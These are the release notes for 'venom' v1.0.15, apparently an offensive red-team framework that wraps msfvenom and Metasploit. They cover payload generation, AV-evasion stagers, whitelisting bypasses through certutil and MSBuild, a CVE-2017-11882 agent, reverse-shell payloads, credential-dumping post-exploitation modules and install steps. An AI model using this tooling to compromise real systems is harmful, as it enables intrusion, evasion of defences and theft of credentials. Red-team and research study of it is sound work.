venom v1.0.15 :: Pandora's box (pithos)
Version release: v1.0.15
Author: pedro ubuntu [ r00t-3xp10it ]
Codename: Pandora's box (pithos)
Distros Supported: Linux Ubuntu, Kali, Debian, BackBox, Parrot OS
Suspicious-Shell-Activity© (SSA) RedTeam develop @2018
:: Framework Description ::
This tool uses msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll |
msi | hta-psh | docm | deb | xml | ps1 | bat | exe | elf | macho | etc ) then injects the shellcode generated
into one template (example: python) "the python funtion will execute the shellcode in RAM" and uses
compilers like gcc (gnu cross compiler) or mingw32 or pyinstaller.py to build the executable file, it also
starts an multi-handler to recibe the remote connection (shell or meterpreter).
venom also gives you the oportunity to deliver your payloads using apache2 webserver (LAN networks),
and ships with self-writen post-modules that enchants metasploit framework: linux_hostrecon.rb (host
info gather) or enigma_fileless_uac_bypass.rb (privilege escalation for microsoft systems disclosed by
enigma0x3) or arno0x0x - meterpreter loader random bytes stager (msf meterpreter improved loaders).
It also implements recent disclosed vulnerabilitys in 'Applications Whitelisting Bypasses' by: @subTee
@enigma0x3 | @mattifestation, etc .. By using signed Microsoft binaries, and injecting code into them,
we effectively cloak our binaries so that they can execute, even under the watchful eye of Device Guard.
[certutil.exe -urlcache module] disclosed by subTee, download/exec remote binary using one HTA
[MSbuild xml-exec module] disclosed by subTee, abusing M$ signed binarys to achieve RCE
:: v1.0.15 Changelog ::
New agents added
- @subTee - certutil remote download/execute agent(.bat|.exe)
- @subTee - csharp shellcode.xml (MSbuild.exe - appl_whitelisting_bypass)
- node.js reverse shell added to categorie: 'system built-in shells'
- unix_exploit (agent.php uploaded/executed in target apache2)
- linux elf agent (x86|x64 bits - doubleclick execution)
- CVE-2017-11882 (Microsoft office word rtf) agent.rft
- SSL CERT connection payloads: 'windows/meterpreter/reverse_winhttps'
'linux/x86/meterpreter_reverse_https' 'linux/x64/meterpreter_reverse_https' - IOS devices macho payloads: 'osx/armle/shell_reverse_tcp'
'apple_ios/aarch64/meterpreter_reverse_tcp'
'osx/x64/meterpreter/reverse_tcp'
New Post-exploitation modules
- linux_hostrecon.rb added to apache2 attack vector
- wifi_dump_linux.rb added to apache2 attack vector
Framework Improvements
- Abort funtion improved in all module builds
- Framework CLI interface re-designed (terminal displays).
- All builds detection ratio review (no-distribute url recent reports)
- x64 arch support added to kimi.py (debian payload generator)
- Executable DLL payload (.cpl) option, added to all dll agents
- uuid (@nullbyte) obfuscation module added to some builds
- arno0x0x meterpreter loader random bytes stager (av evasion)
Framework Bug-fixes
- msf encoders arch bug-fixed under venom
- support to x64 AMD chiptechs review/bug-fixes
:: v1.0.15 Update Detailed Description ::
The biggest update in version 1.0.15 can be found on its CLI interface, which now provides users with
a more intuitive/polish main-menu and sub-menus terminal displays, This new release now packs the
agents based on target operative system (Unix, Microsoft, Osx, Android, etc) and displays a more
detailed information about the agents like: target systems, agent execution, agent detection ratio,etc ..
:: SSL CERT Connection Payloads ::
venom 1.0.15 ships with 3 new special payloads that allows users to secure your initial staged/stageless
connection for Meterpreter by having it check the certificate (SSL) of the listener it is connecting to.
- windows/meterpreter/reverse_winhttps (staged)
- linux/x86/meterpreter_reverse_https (stageless)
- linux/x64/meterpreter_reverse_https (stageless)
Every time venom users decide to use this payloads, the agent (client) will authenticate (SHA1)
the connection to the handler (server) using venom's SSL certificate to encrypt the connection.
@OJ - staged-vs-stageless handlers: http://buffered.io/posts/staged-vs-stageless-handlers/
:: Meterpreter Random Bytes Stager ::
Another big update was the implemention of: 'arno0x0x - meterpreter loader random bytes stager'.
This setting forces venom toolkit at start to backup/replace the msf meterpreter_loader.rb (x86) and
is counterpart (x64), rebuild msf database (msfdb) and reload venom's meterpreter_loaders into msf.
IF the option 'RANDOM_STAGER_BYTES=ON' its active in venom settings file. This new loaders will
add an arbitrary number of random bytes at the beginning of the stage being sent back to the stager
in an attempt to evade AV signature detection and runtime detection. If the setting its set to OFF then
venom will not copy the new meterpreter loaders to msf, using metasploit default ones to work .
REMARK: This method was not tested yet using https payloads (@Arno0x0x) ..
REMARK: This obfuscation technic can only be used in windows/meterpreter staged payloads,
because the 'obfuscation' it requires a stage (dll reflection) being sent back to the agent (client) ..
Staged Payloads Connection Diagram:
- agent (client) its executed in target system
- connects to server (handler) to ask for stage (dll reflection)
- random bytes are added in the beggining of the stage <-- arno0x0x obfuscation method
- stage its send back to agent (client)
- dll reflection executed in target ram
- meterpreter session open
Obfuscation Supported Payloads
- windows/meterpreter/reverse_tcp
- windows/meterpreter/reverse_tcp_dns
- windows/meterpreter/reverse_http
- windows/x64/meterpreter/reverse_tcp
- windows/x64/meterpreter/reverse_http
:: Automate Venom's Post-Exploitation Modules ::
This version also allows users to automate venom's post-exploitation modules (resource_files.rc)
"venom triggers the post-exploitation modules by using apache2 webserver to deliver the agents".
Lets look at the follow example: linux_hostecon.rb in venom runs by default only one system
enumeration module, but the post-module was more advanced options that can be manually set:
- sessions <-- the session number to run the module againts
- store_loot <-- allow users to write session logfile into .msf4/loot folder
- single_command <-- allow users to execute a remote bash command
- agressive_dump <-- uses agressive modules to gather more info about target
- credentials_dump <-- dumps credentials from target system
- the_fapenning <-- searchs in target system for hidden porn related folders/files
Edit /venom/aux/linux_hostrecon.rc and set any of the above described options, save file, run venom.
run post/linux/gather/linux_hostrecon SINGLE_COMMAND="netstat -atnp | grep "ESTABLISHED""
This will trigger linux_hostrecon.rb default enumeration module and execute the inputed bash command.
REMARK: All post-exploitation modules can be found under ../venom/aux folder and they can also
be executed using meterpreter prompt: meterpreter > resource /root/venom/aux/[resource_name.rc]
REMARK: New metasploit release has deleted multi_console_command.rb (by darkoperator)
that allows venom users to auto-run post-exploitation modules at session creation, but venom's
resource files can yet be called using: meterpreter > resource /root/venom/aux/[resource_name.rc]
:: Video Tutorials ::
linux_hostrecon(rc|rb) post-module automatization (multi-OS - agent.py)
https://www.youtube.com/watch?v=xROot1-NAaI
certutil.exe -urlcache - download/execute an bat|exe remotelly (Windows-OS - agent.hta)
PE shellcode cave injection - inject shellcode into legit applications (Windows-OS - agent.exe)
https://www.youtube.com/watch?v=L87YvJTsucE
ELF - inject shellcode into 'Executable and Linkable Format' files (Unix-OS - agent.elf)
https://www.youtube.com/watch?v=D894pMieQcM
:: Git download/install ::
1º - Download framework from github
git clone https://github.com/r00t-3xp10it/venom.git
2º - Set files execution permitions
cd venom
sudo chmod -R +x *.sh
sudo chmod -R +x *.py
3º - Install all dependencies
cd aux
sudo ./setup.sh
4º - Run main tool
sudo ./venom.sh
Special thanks: @Arno0x0x (meterpreter loader random bytes stager)
@subTee @enigma0x3 @carnal0wnage (applications_whitelisting_bypass + uac_bypass)
@H4D3S(SSA) @ChaitanyaHaritash(SSA) <-- 'The guy who encomended this job to me' 🥇
All the hard work goes to: @HDMoore (metasploit) | @NickHarbour (PEScrambler.exe)
@HarmJ0y (pyherion) | @g0tmi1k @ChrisTuncker @HarmJ0y (ruby template stager.rb)
@cortesi (pyinstaller) | @0Entropy (powershell poc's) | @mgraeber (powershell poc's)
@liviu (encrypt_polarSSL) | @alor&naga (ettercap mitm+dns_spoof ) | @astr0baby (poc's)
@Rel1k (set/unicorn shellcode poc's) | @nullbyte (powershell+shellcode poc's)
:: Referencies ::
https://twitter.com/subtee/status/888122309852016641
http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html
https://arno0x0x.wordpress.com/2016/04/13/meterpreter-av-ids-evasion-powershell
https://www.virusbulletin.com/virusbulletin/2016/07/journey-evasion-enters-behavioural-phase/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-mshta-exe/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/